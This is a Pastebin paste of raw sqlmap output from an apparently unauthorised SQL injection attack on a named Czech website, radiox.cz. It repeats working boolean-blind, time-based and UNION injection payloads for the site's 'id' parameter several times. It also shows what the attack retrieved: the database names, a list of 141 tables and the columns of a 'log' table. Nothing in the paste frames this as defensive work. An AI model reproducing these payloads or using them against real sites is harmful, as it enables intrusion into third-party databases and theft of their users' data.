Advertisement
OCBSerbia

radiox.cz sqlmap log

Dec 29th, 2019
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.12 KB | None | 0 0
  1. sqlmap identified the following injection point(s) with a total of 259 HTTP(s) requests:
  2. ---
  3. Parameter: id (GET)
  4. Type: boolean-based blind
  5. Title: AND boolean-based blind - WHERE or HAVING clause
  6. Payload: id=1 AND 8611=8611&nejm=TESLA2101BV&ur=0
  7.  
  8. Type: time-based blind
  9. Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  10. Payload: id=1 AND (SELECT 9524 FROM (SELECT(SLEEP(5)))QpMH)&nejm=TESLA2101BV&ur=0
  11.  
  12. Type: UNION query
  13. Title: Generic UNION query (NULL) - 18 columns
  14. Payload: id=-4126 UNION ALL SELECT NULL,CONCAT(0x716a786271,0x547475545a63504b7877504167594f454e534f6274774b6d7963626d486255756d79584f54754f6c,0x716a7a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- tREV&nejm=TESLA2101BV&ur=0
  15. ---
  16. web application technology: Apache
  17. back-end DBMS: MySQL >= 5.0.12
  18. available databases [2]:
  19. [*] information_schema
  20. [*] radiox_cz
  21.  
  22. sqlmap resumed the following injection point(s) from stored session:
  23. ---
  24. Parameter: id (GET)
  25. Type: boolean-based blind
  26. Title: AND boolean-based blind - WHERE or HAVING clause
  27. Payload: id=1 AND 8611=8611&nejm=TESLA2101BV&ur=0
  28.  
  29. Type: time-based blind
  30. Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  31. Payload: id=1 AND (SELECT 9524 FROM (SELECT(SLEEP(5)))QpMH)&nejm=TESLA2101BV&ur=0
  32.  
  33. Type: UNION query
  34. Title: Generic UNION query (NULL) - 18 columns
  35. Payload: id=-4126 UNION ALL SELECT NULL,CONCAT(0x716a786271,0x547475545a63504b7877504167594f454e534f6274774b6d7963626d486255756d79584f54754f6c,0x716a7a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- tREV&nejm=TESLA2101BV&ur=0
  36. ---
  37. web application technology: Apache
  38. back-end DBMS: MySQL >= 5.0.12
  39. Database: radiox_cz
  40. [141 tables]
  41. +---------------------+
  42. | schema |
  43. | access |
  44. | ar_data |
  45. | ar_titles |
  46. | ar_vata |
  47. | assair |
  48. | baner |
  49. | base_file |
  50. | base_group |
  51. | base_item |
  52. | base_line |
  53. | base_log |
  54. | base_rights |
  55. | burza_dial |
  56. | burza_inz |
  57. | burza_kat |
  58. | burza_search |
  59. | checker |
  60. | chemas |
  61. | chinese |
  62. | cinnost |
  63. | doklad |
  64. | doklad_bkp |
  65. | doprava |
  66. | dph |
  67. | firma |
  68. | forum_group |
  69. | forum_lines |
  70. | forum_msg |
  71. | kanal |
  72. | klipy |
  73. | kursy |
  74. | kutil_collect |
  75. | kutil_collect_data |
  76. | kutil_collect_info |
  77. | kutil_collect_item |
  78. | kutil_collect_mark |
  79. | kutil_collect_pages |
  80. | kutil_collect_wish |
  81. | kutil_device |
  82. | kutil_forum_group |
  83. | kutil_forum_lines |
  84. | kutil_forum_msg |
  85. | kutil_group |
  86. | kutil_msg |
  87. | kutil_msgs |
  88. | kutil_skills |
  89. | kutil_srs_cata |
  90. | kutil_srs_data |
  91. | kutil_srs_hesla |
  92. | kutil_srs_litera |
  93. | kutil_srs_parts |
  94. | kutil_srs_titles |
  95. | kutil_srs_vata |
  96. | kutil_srs_wirecata |
  97. | kutil_transact |
  98. | kutil_transact_typ |
  99. | kutil_user |
  100. | kutil_user_device |
  101. | kutil_user_skills |
  102. | locator |
  103. | log |
  104. | log_bkp |
  105. | norobots |
  106. | obce |
  107. | obce_bkp |
  108. | obce_mala_dbf |
  109. | odkazy |
  110. | osoby |
  111. | partner |
  112. | pocasi |
  113. | pocasi_bkp |
  114. | pocasi_stanice |
  115. | polozky |
  116. | rdb_auto |
  117. | rdb_radio |
  118. | rdb_use |
  119. | rdb_vata |
  120. | remocontrol |
  121. | rokstat |
  122. | sbf |
  123. | servis |
  124. | servis_files |
  125. | shop |
  126. | shop_ask |
  127. | shop_baner |
  128. | shop_config |
  129. | shop_discount |
  130. | shop_doprava |
  131. | shop_gadgets |
  132. | shop_guide |
  133. | shop_kat |
  134. | shop_kits |
  135. | shop_kosik |
  136. | shop_kosik_bkp |
  137. | shop_kosik_bkp_new |
  138. | shop_nakup |
  139. | shop_nakup_bkp |
  140. | shop_obj |
  141. | shop_obj_nakup |
  142. | shop_private |
  143. | shop_search |
  144. | shop_stav |
  145. | shop_temps |
  146. | shop_zak |
  147. | shop_zbozi |
  148. | size_charts |
  149. | skupina |
  150. | spoluzaci |
  151. | srs_cata |
  152. | srs_data |
  153. | srs_hesla |
  154. | srs_litera |
  155. | srs_parts |
  156. | srs_titles |
  157. | srs_user |
  158. | srs_vata |
  159. | svatky |
  160. | svatky_zal |
  161. | svatky_zal_280112 |
  162. | svatky_zal_290112 |
  163. | tb_pins |
  164. | tb_socket |
  165. | tb_tubes |
  166. | testace |
  167. | testace_access |
  168. | typvydaje |
  169. | typzak |
  170. | uhrada |
  171. | ukoly |
  172. | vincom |
  173. | vincom_bkp |
  174. | vincom_cross |
  175. | vincom_firma |
  176. | vincom_missing |
  177. | vincom_notes |
  178. | vincom_types |
  179. | vydaje |
  180. | vyroci |
  181. | zbozi |
  182. | zbozi_bkp |
  183. +---------------------+
  184.  
  185. sqlmap resumed the following injection point(s) from stored session:
  186. ---
  187. Parameter: id (GET)
  188. Type: boolean-based blind
  189. Title: AND boolean-based blind - WHERE or HAVING clause
  190. Payload: id=1 AND 8611=8611&nejm=TESLA2101BV&ur=0
  191.  
  192. Type: time-based blind
  193. Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  194. Payload: id=1 AND (SELECT 9524 FROM (SELECT(SLEEP(5)))QpMH)&nejm=TESLA2101BV&ur=0
  195.  
  196. Type: UNION query
  197. Title: Generic UNION query (NULL) - 18 columns
  198. Payload: id=-4126 UNION ALL SELECT NULL,CONCAT(0x716a786271,0x547475545a63504b7877504167594f454e534f6274774b6d7963626d486255756d79584f54754f6c,0x716a7a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- tREV&nejm=TESLA2101BV&ur=0
  199. ---
  200. web application technology: Apache
  201. back-end DBMS: MySQL >= 5.0.12
  202. Database: radiox_cz
  203. Table: log
  204. [8 columns]
  205. +----------+--------------+
  206. | Column | Type |
  207. +----------+--------------+
  208. | time | datetime |
  209. | data | varchar(50) |
  210. | host | varchar(50) |
  211. | id | bigint(20) |
  212. | id_osoby | int(11) |
  213. | par | varchar(255) |
  214. | typ | char(1) |
  215. | visit | int(11) |
  216. +----------+--------------+
  217.  
  218. sqlmap resumed the following injection point(s) from stored session:
  219. ---
  220. Parameter: id (GET)
  221. Type: boolean-based blind
  222. Title: AND boolean-based blind - WHERE or HAVING clause
  223. Payload: id=1 AND 8611=8611&nejm=TESLA2101BV&ur=0
  224.  
  225. Type: time-based blind
  226. Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  227. Payload: id=1 AND (SELECT 9524 FROM (SELECT(SLEEP(5)))QpMH)&nejm=TESLA2101BV&ur=0
  228.  
  229. Type: UNION query
  230. Title: Generic UNION query (NULL) - 18 columns
  231. Payload: id=-4126 UNION ALL SELECT NULL,CONCAT(0x716a786271,0x547475545a63504b7877504167594f454e534f6274774b6d7963626d486255756d79584f54754f6c,0x716a7a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- tREV&nejm=TESLA2101BV&ur=0
  232. ---
  233. web application technology: Apache
  234. back-end DBMS: MySQL >= 5.0.12
  235. sqlmap resumed the following injection point(s) from stored session:
  236. ---
  237. Parameter: id (GET)
  238. Type: boolean-based blind
  239. Title: AND boolean-based blind - WHERE or HAVING clause
  240. Payload: id=1 AND 8611=8611&nejm=TESLA2101BV&ur=0
  241.  
  242. Type: time-based blind
  243. Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  244. Payload: id=1 AND (SELECT 9524 FROM (SELECT(SLEEP(5)))QpMH)&nejm=TESLA2101BV&ur=0
  245.  
  246. Type: UNION query
  247. Title: Generic UNION query (NULL) - 18 columns
  248. Payload: id=-4126 UNION ALL SELECT NULL,CONCAT(0x716a786271,0x547475545a63504b7877504167594f454e534f6274774b6d7963626d486255756d79584f54754f6c,0x716a7a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- tREV&nejm=TESLA2101BV&ur=0
  249. ---
  250. web application technology: Apache
  251. back-end DBMS: MySQL >= 5.0.12
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement